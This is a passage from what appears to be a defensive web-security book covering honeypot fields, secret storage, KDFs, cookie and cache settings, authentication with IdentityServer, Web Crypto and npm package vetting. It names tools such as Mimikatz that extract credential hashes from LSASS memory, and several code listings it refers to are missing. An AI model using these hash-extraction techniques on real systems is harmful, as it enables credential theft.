Spamming bots operating on custom mechanisms will in most cases just try, then move on. If you decide to use one of the common offerings from above, exploits will be more common, depending on how widespread the offering is. This is one of the cases where going custom is a better option. Worst case, you get some spam and modify your technique, but you get to keep things simple and tailored to your web application and your users’ needs, with no external dependencies and no monthly fees. This is also the simplest technique and requires very little work to implement.
So what we do is create a field that is not visible to humans and is supposed to be kept empty. On the server once the form is submitted, we check that it is still empty. If it is not, then we assume a bot has been at it.
This is so simple, does not get in the way of your users, yet very effective at filtering bot spam.
This is also shown above in a larger example in the Lack of Input Validation, Filtering and Sanitisation section. I show the validation code middleware of the route on line 28 below. The validation is performed on line 14.
So as you can see, a very simple solution. You could even consider combining the above two techniques.
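As a stand-alone illustration of the empty hidden field check, here is a minimal, framework-free sketch. The field name `bot-pot`, the function names and the choice to answer with a 400 are assumptions for the example; the middleware follows the common `(req, res, next)` shape without depending on any particular framework.

```javascript
// 'bot-pot' is a hypothetical field name; hide the input with CSS so that
// humans never see it or fill it in.
const HONEYPOT_FIELD = 'bot-pot';

// Returns true when the hidden field came back with content.
function honeypotTripped(formBody) {
  const value = formBody[HONEYPOT_FIELD];
  if (typeof value === 'string') return value.length > 0;
  return value !== undefined && value !== null;
}

// Middleware shape (req, res, next): reject the request when the field is filled.
function rejectBots(req, res, next) {
  if (honeypotTripped(req.body || {})) {
    res.statusCode = 400;
    return res.end('Bad Request');
  }
  return next();
}

console.log(honeypotTripped({ name: 'Kim', 'bot-pot': '' }));     // false
console.log(honeypotTripped({ 'bot-pot': 'http://spam.example' })); // true
```

Depending on your needs you may prefer to accept the request silently and discard it, so the bot gets no feedback.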
Check out the “Testing for Captcha (OWASP-AT-008)” in v3 of the OWASP Testing Guide for summary and description of the issue and testing examples. The Offensive Web Testing Framework (OWTF) also has a plugin for it.
Secure password management within applications is a case of doing what you can, often relying on obscurity and leaning on other layers of defence to make compromise harder, like many of the layers already discussed in the previous chapters. Review the Storage of Secrets subsections in the Cloud chapter for some ideas and tooling options to help with this.
Find out how secret the supposedly secret data being sent over the network actually is, and consider your internal network just as malicious as the internet. Then you will be starting to get the idea of what defence in depth is about. That way, when one defence breaks down, you will still be in good standing.
You may read in many places that having data-store passwords and other types of secrets in configuration files in clear text is an insecurity that must be addressed. Then when it comes to mitigation, there seem to be a few techniques that help, but most of them are based around obscuring the secret rather than securing it. Essentially they just make discovery a little more inconvenient, like running SSH on a port other than the default of 22. Maybe surprisingly though, obscurity does significantly reduce the number of opportunistic attacks from bots and script kiddies.
Do not hard code passwords in source files for all developers to see. Doing so also means the code has to be patched when services are breached. At the very least, store them in configuration files and use different configuration files for different deployments and consider keeping them out of source control.
Here are some examples using the node-config module.
node-config is a fully featured, well maintained configuration package that I have used on a good number of projects.
To install: From the command line within the root directory of your NodeJS application, run the following (node-config is published on npm under the package name config):
npm install config --save
Now you are ready to start using node-config. An example of the relevant section of an app.js file may look like the following:
Wherever you use node-config, in your routes for example:
A good collection of different formats can be used for the config files:
There is a specific file loading order which you specify by file naming convention, which provides a lot of flexibility and which caters for:
$NODE_ENV environment variable to for example:
local. These files are to be managed by external configuration management tools, build scripts, etc. Thus providing even more flexibility about where your sensitive configuration values come from.
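The effect of a layered loading order can be pictured with a small stand-alone sketch. This is not node-config's implementation, only an illustration of later layers overriding earlier ones; the layer contents, the host names and the `loadConfig` and `mergeLayers` functions are all hypothetical.

```javascript
function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Recursively merge `override` into a copy of `base`; later layers win.
function mergeLayers(base, override) {
  const result = { ...base };
  for (const [key, value] of Object.entries(override)) {
    const bothObjects = isPlainObject(value) && isPlainObject(result[key]);
    result[key] = bothObjects ? mergeLayers(result[key], value) : value;
  }
  return result;
}

// Hypothetical layers, standing in for default, per-deployment and local files.
const defaults = { dataStore: { host: 'localhost', user: 'app', password: '' } };
const production = { dataStore: { host: 'db.internal.example' } };
const local = { dataStore: { password: 'set-by-config-management' } };

// Apply the layers in order: defaults, then deployment, then local.
function loadConfig(nodeEnv) {
  const deployment = nodeEnv === 'production' ? production : {};
  return [defaults, deployment, local].reduce((acc, layer) => mergeLayers(acc, layer), {});
}

console.log(loadConfig('production').dataStore.host); // db.internal.example
```

The point of the design is that the sensitive values live only in the last layer, which can be kept out of source control and written by your deployment tooling.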
The config files for the required attributes used above may take the following directory structure:
The contents of the above example configuration files may look like the following:
The Logging section shows more configuration options to provide a slightly bigger picture.
Encrypting/decrypting credentials in code may provide some obscurity, but not much more than that.
There are different answers for different platforms. None of them provide complete security, if there is such a thing; instead they focus on different levels of obscurity.
Store database credentials as a Local Security Authority (LSA) secret and create a DSN with the stored credential. Use a SqlServer connection string with
The hashed credentials are stored in the SAM file and the registry. If an attacker has physical access to the storage, they can easily copy the hashes if the machine is not running or can be shut down. The hashes can be sniffed from the wire in transit. The hashes can also be pulled from the running machine’s memory (specifically the Local Security Authority Subsystem Service (LSASS.exe)) using tools such as Mimikatz, WCE, Metasploit’s hashdump or fgdump.
NTDS.dit database file, along with the DBLayer that is running inside the NTDSAI.DLL (DSA), is directly managed by the Extensible Storage Engine (ESE), which tries to read as much as possible into the
Encrypt sections of web, executable, machine-level or application-level configuration files using aspnet_regiis.exe with the -pe option, the name of the configuration element to encrypt, and the configuration provider you want to use: either DataProtectionConfigurationProvider (uses DPAPI) or RSAProtectedConfigurationProvider (uses RSA). The -pd switch is used to decrypt, or decrypt programmatically:
string connStr = ConfigurationManager.ConnectionStrings["MyDbConn1"].ToString();
Of course there is a problem with this also. DPAPI uses LSASS, from whose memory an attacker can again extract the hash. If the
RSAProtectedConfigurationProvider has been used, a key container is required. Mimikatz will force an export from the key container to a
Which can then be read using OpenSSL or tools from the
I have looked at a few other ways using
SecureString. They all seem to rely on DPAPI which as mentioned uses LSASS which is open for exploitation.
Credential Guard and Device Guard leverage virtualisation-based security, which by the look of it still uses LSASS. Bromium have partnered with Microsoft and coined the term Micro-virtualization. The idea is that every user task is isolated into its own micro-VM. There seems to be some confusion as to how this is any better. Tasks still need to communicate outside of their VM, so what is to stop malicious code doing the same? I have seen lots of questions but no compelling answers yet. Credential Guard must run directly on physical hardware; it can not run on virtual machines. This alone rules out many deployments.
“Bromium vSentry transforms information and infrastructure protection with a revolutionary new architecture that isolates and defeats advanced threats targeting the endpoint through web, email and documents”
“vSentry protects desktops without requiring patches or updates, defeating and automatically discarding all known and unknown malware, and eliminating the need for costly remediation.”
This is marketing talk. Please don’t take this literally.
“vSentry empowers users to access whatever information they need from any network, application or website, without risk to the enterprise”
“Traditional security solutions rely on detection and often fail to block targeted attacks which use unknown “zero day” exploits. Bromium uses hardware enforced isolation to stop even “undetectable” attacks without disrupting the user.”
“With Bromium micro-virtualization, we now have an answer: A desktop that is utterly secure and a joy to use”
These seem like bold claims.
Also worth considering is that Microsoft’s new virtualization-based security also relies on UEFI Secure Boot, which has been proven insecure.
Containers also help to provide some form of isolation, allowing you to give user accounts only the ability to do what is necessary for the application.
I usually use a deployment tool that also changes the permissions and ownership of the files involved with the running web application to a single system user, so unprivileged users can not access the web application’s files at all. The deployment script is executed over SSH in a remote shell. Only specific commands on the server are allowed to run and a very limited set of users have any sort of access to the machine. If you are using Linux or Docker Containers then you can reduce this even more if it is not already.
One of the beauties of GNU/Linux is that you can have as much or as little security as you decide. No one has made that decision for you already and locked you out of the source. You are not fed lies, as you are by all of the closed source OS vendors trying to pimp their latest money spinning product. GNU/Linux is a dirty little secret that requires no marketing hype. It just provides complete control if you want it. If you do not know what you want, then someone else will probably take that control from you. It is just a matter of time if it hasn’t happened already.
An application should have the least privileges possible in order to carry out what it needs to do. Consider creating accounts for each trust distinction. For example, where you only need to read from a data store, create that connection with a user’s credentials that are only allowed to read, and so on for other privileges. This way the attack surface is minimised, adhering to the principle of least privilege. Also consider removing table access completely from the application and only providing permissions to the application to run stored queries. This way if/when an attacker is able to compromise the machine and retrieve the password for an action on the data-store, they will not be able to do a lot anyway.
Put your services like data-stores on network segments that are as sheltered as possible and only contain similar services.
Maintain as few user accounts on the servers in question as possible, each with the fewest privileges possible.
As part of your defence in depth strategy, you should expect that your data-store is going to get stolen, but hope that it does not. What assets within the data-store are sensitive? How are you going to stop an attacker that has gained access to the data-store from making sense of the sensitive data?
As part of developing the application that uses the data-store, a strategy also needs to be developed and implemented to carry on business as usual when this happens. For example, when your detection mechanisms realise that someone unauthorised has been on the machine(s) that host your data-store, as well as the usual alerts being fired off to the people that are going to investigate and audit, your application should take some automatic measures like:
If you follow the recommendations below, data-store theft alone will be an inconvenience, but not a disaster.
Consider what sensitive information you really need to store. Consider using the following key derivation functions (KDFs) for all sensitive data. Not just passwords. Also continue to remind your customers to always use unique passwords that are made up of alphanumeric, upper-case, lower-case and special characters. It is also worth considering pushing the use of high quality password vaults. Do not limit password lengths. Encourage long passwords.
PBKDF2, bcrypt and scrypt are KDFs that are designed to be slow, and are used in a process commonly known as key stretching. How long key stretching takes can be tuned by increasing or decreasing the number of cycles used, often 1000 cycles or more for passwords. “The function used to protect stored credentials should balance attacker and defender verification. The defender needs an acceptable response time for verification of users’ credentials during peak use. However, the time required to map <credential> -> <protected form> must remain beyond threats’ hardware (GPU, FPGA) and technique (dictionary-based, brute force, etc) capabilities.”
OWASP Password Storage
PBKDF2, bcrypt and the newer scrypt, apply a Pseudorandom Function (PRF) such as a cryptographic hash, cipher or keyed-Hash Message Authentication Code (HMAC) to the data being received along with a unique salt. The salt should be stored with the hashed data.
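Key stretching with a unique salt can be sketched with the PBKDF2 implementation in the Node.js `crypto` module. The iteration count, key length, digest and record layout below are illustrative assumptions; tune the iteration count to the response time your own hardware can tolerate.

```javascript
const crypto = require('crypto');

// Illustrative parameters; tune the iteration count to your own hardware.
const ITERATIONS = 100000;
const KEY_LENGTH = 32;
const DIGEST = 'sha256';

// Returns a record that keeps the salt and iteration count next to the hash.
function protect(password, iterations = ITERATIONS) {
  const salt = crypto.randomBytes(16); // unique per credential
  const hash = crypto.pbkdf2Sync(password, salt, iterations, KEY_LENGTH, DIGEST);
  return { salt: salt.toString('hex'), iterations, hash: hash.toString('hex') };
}

// Re-derive with the stored salt and iteration count, then compare in constant time.
function verify(password, record) {
  const salt = Buffer.from(record.salt, 'hex');
  const expected = Buffer.from(record.hash, 'hex');
  const actual = crypto.pbkdf2Sync(password, salt, record.iterations, expected.length, DIGEST);
  return crypto.timingSafeEqual(actual, expected);
}

const record = protect('correct horse battery staple');
console.log(verify('correct horse battery staple', record)); // true
console.log(verify('Tr0ub4dor&3', record));                  // false
```

Storing the iteration count in the record means it can be raised for new credentials without invalidating existing ones.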
Do not use MD5, SHA-1 or the SHA-2 family of cryptographic one-way hashing functions by themselves for cryptographic purposes like hashing your sensitive data. In fact, do not use hashing functions at all for this unless they are leveraged with one of the mentioned KDFs. Why? Because they were not designed for passwords (to be slow), and their hashing speed can not be slowed as hardware continues to get faster. Many organisations that have had their data-stores stolen, and continue to on a weekly basis, could avoid their secrets being compromised simply by using a decent KDF with salt and a decent number of iterations. “Using four AMD Radeon HD6990 graphics cards, I am able to make about 15.5 billion guesses per second using the SHA-1 algorithm.”
In saying that, PBKDF2 can use MD5, SHA-1 and the SHA-2 family of hashing functions. Bcrypt uses the Blowfish (more specifically the Eksblowfish) cipher. Scrypt does not have user replaceable parts like PBKDF2. The PRF can not be changed from SHA-256 to something else.
This depends on many considerations. I am not going to tell you which is best, because there is no best. You should gain an understanding of at least all three of the following best of breed KDFs often used for password hashing.
PBKDF2 is the oldest, so it is the most battle tested, but lessons have also been learnt from it and taken to the latter two. For example, the hashing functions it utilises (MD5, SHA) are CPU intensive only and easily parallelised on GPUs and Application Specific Integrated Circuits, using very little RAM. We see this in crypto-currency mining.
The next oldest is bcrypt which uses the Eksblowfish cipher, which was designed specifically for bcrypt from the blowfish cipher, to be very slow to initiate thus boosting protection against dictionary attacks which were often run on custom Application-specific Integrated Circuits (ASICs) with low gate counts, often found in GPUs of the day (1999).
The hashing functions that PBKDF2 uses were a lot easier to get speed increases on GPUs due to ease of parallelisation as opposed to the Eksblowfish cipher attributes such as:
GPUs are good at carrying out the exact same instruction set concurrently, but when a branch in the logic occurs (which is how the blowfish algorithm works) on one of the sets, all others stop thus destroying parallelisation on GPUs.
The Arithmetic Logic Units (ALUs), or shaders of a GPU are partitioned into groups, and each group of ALUs shares management, so members of the group cannot be made to work on separate tasks. They can either all work on nearly identical variations of one single task, in perfect sync with one another, or nothing at all.
Bcrypt was specifically designed to be non GPU friendly, which is why it used the existing blowfish cipher.
Now with hardware utilising large Field-programmable Gate Arrays (FPGAs), bcrypt brute-forcing is becoming more accessible due to easily obtainable cheap hardware such as the Xeon+FPGA. We also have the likes of the Xeon Phi which has 60 1GHz cores (minus several used by the system), each with 4 hardware threads. The Phi is pretty close to being a general purpose, many core CPU. The FPGAs are not easy to programme for and neither is the Xeon Phi, as it has its own embedded Linux SOC which runs BusyBox, that you need to SSH into. The following board and chip are also worth considering, although you won’t get the brute-forcing throughput of the Xeon+FPGA or Phi:
Scrypt uses PBKDF2-HMAC-SHA-256 (PBKDF2 of HMAC-SHA256) as its PRF, and the Salsa20/8 core function, which is not a cryptographic hash function as it is not collision resistant, to help make pseudo-random writes to RAM, which it then repeatedly reads in a pseudo-random sequence. FPGAs do not generally have a lot of RAM, so this makes leveraging both FPGAs and GPUs a lot less feasible, thus narrowing down the field of potential hardware cracking options to many core multi-purpose CPUs, such as the Xeon Phi, ZedBoard, Haswell and others.
The sensitive data stored within a data-store should be the output of one of the three key derivation functions we have just discussed. Feed it the data you want protected and a unique salt. All good frameworks will have at least PBKDF2 and bcrypt APIs.
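For comparison, here is a minimal scrypt sketch using `crypto.scryptSync` from the Node.js standard library. The cost parameters, the output length and the `salt:hash` storage format are assumptions for illustration; N controls the CPU and memory cost, r the block size and p the parallelisation factor.

```javascript
const crypto = require('crypto');

// Illustrative cost parameters. Memory used is roughly 128 * N * r bytes,
// so these values need about 16 MiB per derivation.
const SCRYPT_PARAMS = { N: 16384, r: 8, p: 1 };

// Derive a 64 byte key with a unique salt and store both, hex encoded.
function scryptProtect(secret) {
  const salt = crypto.randomBytes(16);
  const derived = crypto.scryptSync(secret, salt, 64, SCRYPT_PARAMS);
  return `${salt.toString('hex')}:${derived.toString('hex')}`;
}

// Re-derive with the stored salt and compare in constant time.
function scryptVerify(secret, stored) {
  const [saltHex, derivedHex] = stored.split(':');
  const expected = Buffer.from(derivedHex, 'hex');
  const actual = crypto.scryptSync(secret, Buffer.from(saltHex, 'hex'), expected.length, SCRYPT_PARAMS);
  return crypto.timingSafeEqual(actual, expected);
}

const stored = scryptProtect('correct horse battery staple');
console.log(scryptVerify('correct horse battery staple', stored)); // true
```

The memory requirement per derivation is what makes wide parallel cracking on memory-poor hardware expensive.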
Possibly also worth considering if you like the bleeding edge, is the new Argon2.
Logging out from an application obviously does not clear the browser cache of any sensitive information that might have been stored. Test that any sensitive data responses have
Expires headers set appropriately.
Use an HTTP intercepting proxy such as ZAP, Burp, etc, to search through the server responses that belong to the session, checking that the server instructed the browser not to cache any data for all responses containing sensitive information.
Use the following headers on such responses:
Cache-Control: no-cache, no-store
Expires: 0, or past date
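Setting these two headers on a Node.js response can be sketched as follows. The helper name `setNoCacheHeaders` is hypothetical; it relies only on the standard `setHeader` method of `http.ServerResponse`, and the demonstration uses a stand-in object so the example runs without starting a server.

```javascript
// Apply the no-cache headers from the text to a Node.js response object.
function setNoCacheHeaders(res) {
  res.setHeader('Cache-Control', 'no-cache, no-store');
  res.setHeader('Expires', '0');
  return res;
}

// Demonstration with a stand-in for http.ServerResponse.
const sent = {};
setNoCacheHeaders({ setHeader: (name, value) => { sent[name] = value; } });
console.log(sent['Cache-Control']); // no-cache, no-store
console.log(sent.Expires);          // 0
```

Call the helper in every handler that returns sensitive data, before the response body is written.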
You can also add the following flags to the
Cache-Control header in order to better prevent persistently linked files on the filesystem:
To check that the browsers are respecting the headers, check the cache stores. For example:
For Mozilla Firefox:
C:\Documents and Settings\<user_name>\Local Settings\Application Data\
For Internet Explorer:
C:\Documents and Settings\<user_name>\Local Settings\Temporary Internet Files
Don’t forget to plug all your changes into your Zap Regression Test suite as discussed in the Process and Practises chapter of Fascicle 0.
Slowing down and rendering cracking infeasible is addressed by the type of KDF and number of rounds you configure. We dealt with this in the “Which KDF to use” section.
I’m going to walk you through some of the important parts of what a possible authentication and authorisation solution might look like that will address the points raised in the Identify Risks section from above.
The following code is one example of how we can establish authentication and authorisation of individuals desiring to work with a system comprised of any number of front-ends (web, mobile, etc), a service layer API that provides an abstraction to, and communicates with the underlying back-end micro-services. The example uses the Resource Owner Password Credentials (ROPC) flow which is quite a common flow with today’s front-end -> service API -> back-end micro-service architectures.
It’s also worth checking out the following sections in the OAuth 2.0 specification around the ROPC flow:
We’ll also discuss integrating external identity providers (The Facebooks, Twitters and Googles) of our world.
Getting to grips with and understanding enough to create a solution like this can be quite a steep learning experience. The folks from IdentityServer, who do this for the love of it, have created an outstanding Open Source Software (OSS) project, and in all my dealings with them have always gone out of their way to help. In all the projects I’ve worked on, with all the edge cases, there has always been a way to create the solution that satisfied the requirements.
Ideally reference access tokens should be used between front-end(s) and the service layer, which they are in this case, and then JWTs, which contain a signed list of the user’s claims, from the service layer to the back-end micro-services.
JWTs can not be revoked as they are self contained (they contain everything about a user that is necessary to make a decision about what the user should be authorised to access).
Reference tokens on the other hand simply contain a reference to the user account which is managed by identity server via MembershipReboot in this case. Thus enabling revocation (logging out of the user for example).
Identity server does not currently support using both types of token at once (reference for front-end, JWT for back-end); you can only switch between one or the other, although support is on the road map. Until this configuration is supported, the service layer can get the user’s claims by using the reference token, one of those claims being the user GUID. The claims could then be propagated to the micro-services.
IdentityServer2 was focussed around authentication with some OAuth2 support to assist with authentication.
AuthorizationServer was more focused on OAuth2 for delegated authorisation.
IdentityServer3 is a C#.NET library that focusses on both authentication and authorisation. You don’t have to have your surrounding out of process components (service layer, micro-services) in .NET for IdentityServer3 to be a viable option. They could be written in another language, so long as they speak HTTP.
MembershipReboot is a user identity management library with a similar name to the ASP.NET Membership Provider, inspired by the frustrations that Brock Allen (MembershipReboot creator) had with it, such as:
AccountLockoutFailedLoginAttempts and the much needed
MembershipRebootConfiguration class which does what you expect it to do.
Some noteworthy benefits I’ve found with MembershipReboot are:
Whereas going down the path of MembershipReboot and IdentityServer3.MembershipReboot, which is a “User Service plugin for IdentityServer v3 that uses MembershipReboot as its identity management library. In other words, you’re using IdentityServer v3 and you want to use MembershipReboot as your database for user passwords…”, provides the ability to customise out of the box. All you need to do is add the properties you require to the already provided
CustomUser and the data store schema which is also provided in an Entity Framework project that comes with MembershipReboot.
MembershipRebootConfiguration class to dial in the number of iterations (stretching), as seen below on line 29. This provides us with what’s known as an adaptive one-way function. Adaptive because the workload increases each year to keep up with advances in hardware technology. You now have control of how slow you want it to be to crack those passwords. What’s more, the iteration count can be set to change each year automatically. If the developer chooses not to touch the iteration count at all (or more likely, forgets), then the default of 0 is inferred. 0 means to automatically calculate the number based on the OWASP recommendations for the current year. In the year 2000 it should be 1000 iterations. The count should be doubled every subsequent two years, so in 2016 we should be using 256000 iterations, and that’s what MembershipReboot does if the setting is not changed.
The iteration count of each users password is stored with the hashed password, as can be seen above on lines 36 and 38. This means each password can have a different number of iterations applied over time as required. Beautifully thought out!
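The doubling rule is easy to check with a few lines of arithmetic. This is a sketch of the rule as stated in the text (1000 iterations in 2000, doubled every two years), not MembershipReboot's own code; the function name `iterationsForYear` is hypothetical.

```javascript
// 1000 iterations in the year 2000, doubling every two years thereafter.
function iterationsForYear(year) {
  const BASE_YEAR = 2000;
  const BASE_ITERATIONS = 1000;
  if (year <= BASE_YEAR) return BASE_ITERATIONS;
  const doublings = Math.floor((year - BASE_YEAR) / 2);
  return BASE_ITERATIONS * 2 ** doublings;
}

console.log(iterationsForYear(2000)); // 1000
console.log(iterationsForYear(2016)); // 256000
```

Between 2000 and 2016 there are eight doublings, and 1000 x 2^8 = 256000, which matches the figure above.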
With the ASP.NET Membership Provider you can have salted SHA1, which as already mentioned was not designed for what it was chosen to be used for in this case, and there doesn’t appear to be any thought given to the fact that machines keep getting faster (Moore’s Law). MD5 and SHA were designed to be fast, not slow and able to be slowed down. So storing passwords by SHA-1 hashing means they are incredibly fast to crack.
Sadly the next offering in this space (ASP.NET Identity) that Microsoft produced also seems inferior. Brock Allen blogged about some of the shortcomings in his post titled “The good, the bad and the ugly of ASP.NET Identity”, which MembershipReboot caters for, such as the following:
Microsoft Katana provides support for
There are also many other community provided OWIN OAuth middleware providers
The OWIN startup or config file could look like the following. You can see in the second half of the code file is the configuration of the external identity providers:
MembershipReboot supports adding secret questions and answers along with the ability to update user account details. Details on how this can be done are in the sample code kindly provided by Brock Allen and in the documentation on their github wiki.
Using local storage means there is less to be concerned about in terms of protecting the token than with using cookies. localStorage is only concerned with XSS, whereas cookies are susceptible to both CSRF and XSS attacks (although XSS to a lesser degree). If you decide to use local storage, your anti-XSS strategy needs to be water-tight.
Even with the
HttpOnly flag set on your cookie, it is possible to compromise the cookie contents if the values of the
Path cookie attributes are too permissive. For example if you have the
Domain value set to
.localtest.me, an attacker can attempt to launch attacks on the cookie token between other hosts with the same domain name. Some of these hosts may contain vulnerabilities, thus increasing the attack surface.
Secure attribute on the cookie. This instructs web browsers to only send the cookie over a TLS (HTTPS) connection, thus removing this MItM attack vector.
You can and should test this by inspecting the headers with an HTTP intercepting proxy. While you’re at it, you may as well add this as a test to your Zap Regression Test suite as discussed in the Process and Practises chapter of Fascicle 0.
Secure flag must also be enabled as mentioned above, in order to mitigate Session Id theft.
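The cookie attributes discussed above can be combined into a single `Set-Cookie` header value. This is a minimal sketch: the cookie name `session`, the `/api` path and the 1200 second lifetime are hypothetical values, and the `Domain` attribute is deliberately omitted so that the browser treats the cookie as host-only.

```javascript
// Build a Set-Cookie header value with restrictive attributes.
// Cookie name, path and max-age are hypothetical values for this sketch.
function buildSessionCookie(token, { path = '/api', maxAgeSeconds = 1200 } = {}) {
  return [
    `session=${encodeURIComponent(token)}`,
    `Path=${path}`,            // keep the path as narrow as the application allows
    `Max-Age=${maxAgeSeconds}`,
    'HttpOnly',                // not readable from client-side JavaScript
    'Secure',                  // only sent over TLS (HTTPS)
  ].join('; ');                // no Domain attribute: the cookie stays host-only
}

console.log(buildSessionCookie('abc123'));
// session=abc123; Path=/api; Max-Age=1200; HttpOnly; Secure
```

The resulting string would be passed to `res.setHeader('Set-Cookie', ...)` in a Node.js handler, and can be checked in your intercepting proxy.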
CSRF is the most common attack used to leverage cookies containing authentication details. In order to mitigate this attack vector, the use of the synchroniser token pattern is recommended. Each server side technology will implement this type of protection differently. CSRF is discussed in more depth in the Cross-Site Request Forgery (CSRF) sections.
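The core of the synchroniser token pattern can be sketched independently of any server-side technology. The `session` object here stands for whatever per-user server-side session store your framework provides, and the function names are hypothetical; most frameworks ship their own implementation, which is usually the better choice.

```javascript
const crypto = require('crypto');

// Create a random token and remember it in the server-side session.
// `session` is any per-user object your framework provides (an assumption).
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString('hex');
  return session.csrfToken; // embed this in a hidden form field
}

// Compare the submitted token with the one held in the session, in constant time.
function isCsrfTokenValid(session, submitted) {
  if (typeof session.csrfToken !== 'string' || typeof submitted !== 'string') return false;
  const expected = Buffer.from(session.csrfToken, 'utf8');
  const actual = Buffer.from(submitted, 'utf8');
  return actual.length === expected.length && crypto.timingSafeEqual(actual, expected);
}

const session = {};
const token = issueCsrfToken(session);
console.log(isCsrfTokenValid(session, token));    // true
console.log(isCsrfTokenValid(session, 'forged')); // false
```

A forged cross-site request carries the cookie automatically but cannot read the token from the page, so the check fails.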
As for the
Max-Age cookie attributes from
client\ServiceLayer\APIControllers\SecureController.cs (seen above), these will need to be set to the maximum values that the business is prepared to accept along with the
backend\Auth\AuthService.WebApi\IdSvr\Clients.cs (seen above) (which need to line up) for the IdentityServer.
The OWASP Session Management Cheat Sheet has more details around securing cookies.
There are fundamental principles that we need to examine, understand and embrace before we dive into some details.
The attackers will always target the easiest to compromise point of any given encryption protocol.
Cryptography is one small ingredient that may go into creating a system that is aiming to be secure to a degree. Usually it’s just easier to step around or by-pass any crypto. So think of crypto as one defence. Unless all of your other areas of security are better than your crypto solutions, then an attacker will more than likely be targeting the other weaker areas.
Has been implemented across browser vendors now.
The browser is insecure and should never be trusted. HTML5 has added a lot of extra attack surface without adding much in the way of security.
From the W3C Web Cryptography API
Relying on the Web Cryptography API as opposed to using low-level primitives provides a slightly better and more secure starting point. Why it’s only slightly better is discussed in the Risks that Solution Causes section.
In order, from the lower level to higher level, the following Web Crypto API concepts need to be understood:
“The specification assumes, but does not require, that conforming user agents do not and will not be directly implementing cryptographic operations within the user agent itself” Often user agents will defer cryptographic operations to existing APIs available as part of the underlying operating system or to third-party modules not directly managed by the user agent. As you can see, the responsibility doesn’t belong to the server, but rather to the client or more specifically the end user.
Internal slots and methods in the ECMA-262 (3, 5 and 6) standards are usually represented within “[[” and “]]” in the ECMA-262 specifications. Internal slots and methods are pseudo-properties/pseudo-methods that the specification uses to define required state (for internal slots) and behaviour (for internal methods). Internal slots and methods are hidden from user code and never exposed to applications. They may or may not correspond to properties of objects used by the engine and/or exposed via the implementation of the public API. The internal slot named
[[handle]], just as all other internal slots and methods, represents an opaque, implementation specific type. The
CryptoKey (Web API interface)
“The CryptoKey object represents an opaque reference to keying material that is managed by the user agent”
CryptoKey object can be obtained by using
SubtleCrypto.importKey(). See below for details on
Check the specification for further details.
Crypto (Web API interface)
Crypto interface was implemented in some browsers without it being well defined or cryptographically sound. Browsers implementing the Web Crypto API have removed the
Crypto methods and properties other than
Crypto.subtle which provides access to the below
SubtleCrypto interface, which provides all of the Web Crypto API methods.
Check the specification for further details.
SubtleCrypto (Web API interface)
SubtleCrypto provides all the methods to work with the Web Crypto API.
Check the specification for further details.
Cryptography on the client does have its place. Use it in its designated place and in accordance with the standard. We know the server should never trust the client, but if the application is entirely on the client with no server needing to afford trust to the client, and the client doesn’t want to trust the server, then it may be an option worth considering. If you consider how it may be abused at every point along the way, options do start to drop off quickly though. The following are some options that may suit the Web Crypto API:
Is one use case. In this scenario, the server doesn’t need to trust the client. It receives data from the client, stores it and returns it. The user is exchanging their data with themselves in the future. This holds so long as the server never attempts to parse or execute the data, and the only browser it may end up in is that of the client that sent it to start with. The client is responsible for the key. The data is usually encrypted on the client, sent to the server encrypted, fetched back to the client, and finally decrypted again with the key that the client is responsible for.
which uses a similar concept as the cloud storage, but the data doesn’t necessarily have to ever touch the server. A couple of offerings that come to mind are:
Basically client centric applications.
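To make the encrypt on the client, store on the server, decrypt on the client flow a little more concrete, here is a minimal sketch using the Web Crypto API with AES-GCM. It runs under NodeJS via `webcrypto` so that it can be tested easily. In a browser you would use `window.crypto` instead. The function names are hypothetical, the key is simply generated and held in memory, and real key management (the hard part) is not addressed at all.

```javascript
const { webcrypto } = require('node:crypto'); // in a browser, use window.crypto
const { subtle } = webcrypto;

// Generate a non-extractable AES-GCM key that stays with the client.
async function generateClientKey() {
  return subtle.generateKey({ name: 'AES-GCM', length: 256 }, false, ['encrypt', 'decrypt']);
}

// Encrypt text on the client. Only the iv and ciphertext would go to the server.
async function encryptForStorage(key, plaintext) {
  const iv = webcrypto.getRandomValues(new Uint8Array(12)); // fresh IV per message
  const ciphertext = await subtle.encrypt(
    { name: 'AES-GCM', iv },
    key,
    new TextEncoder().encode(plaintext)
  );
  return { iv, ciphertext };
}

// Decrypt what was fetched back from the server, using the client's key.
async function decryptFromStorage(key, { iv, ciphertext }) {
  const plaintext = await subtle.decrypt({ name: 'AES-GCM', iv }, key, ciphertext);
  return new TextDecoder().decode(plaintext);
}

// Stand-in for the full journey: encrypt, "store", "fetch", decrypt.
async function roundTrip(message) {
  const key = await generateClientKey();
  const stored = await encryptForStorage(key, message);
  return decryptFromStorage(key, stored);
}

roundTrip('my private notes').then((text) => console.log(text));
```

The server only ever sees the `iv` and `ciphertext`, which fits the scenario where the server neither trusts nor needs to understand the data it stores.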
My preference is still for any crypto to be performed on the server, where you have more control, less attack surface and greater visibility.
Dibbe Edwards discusses some excellent initiatives on how they do it at IBM. I will attempt to paraphrase some of them here:
There is an excellent paper by the SANS Institute on Security Concerns in Using Open Source Software for Enterprise Requirements that is well worth a read. It confirms what the likes of IBM are doing in regards to their consumption of free and open source libraries.
As a developer, you are responsible for what you install and consume. Malicious NodeJS packages do end up on NPM from time to time. The same goes for any source or binary you download and run. The following commands are often encountered as being “the way” to install things:
Below is the official way to install NodeJS. Do not do this.
curl first, then make sure what you have just downloaded is not malicious.
Please do not curl or fetch in any way and pipe what you think is an installer or any script to your shell without first verifying that what you are about to run is not malicious. Do not download and run in the same command.
The better option is to:
As part of an npm install, package creators, maintainers (or even a malicious entity intercepting and modifying your request on the wire) can define scripts to be run on specific NPM hooks. You can check to see if any package has hooks (before installation) that will run scripts by issuing the following command:
npm show [module-you-want-to-install] scripts
The most important step here is downloading and inspecting before you run.
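If you want to automate that inspection, a sketch along the following lines could flag the scripts that run automatically during an install. It assumes you have already obtained the package's `scripts` object as JSON (for example by adding `--json` to the command above). The hook list covers only the three install hooks and is not exhaustive, and the function name and example data are hypothetical.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Given the parsed `scripts` object of a package, return the hooks that
// would run on install, along with the commands they would execute.
function findInstallHooks(scripts = {}) {
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Hypothetical scripts object for a package under review.
const exampleScripts = { test: 'mocha', postinstall: 'node ./setup.js' };
console.log(findInstallHooks(exampleScripts));
```

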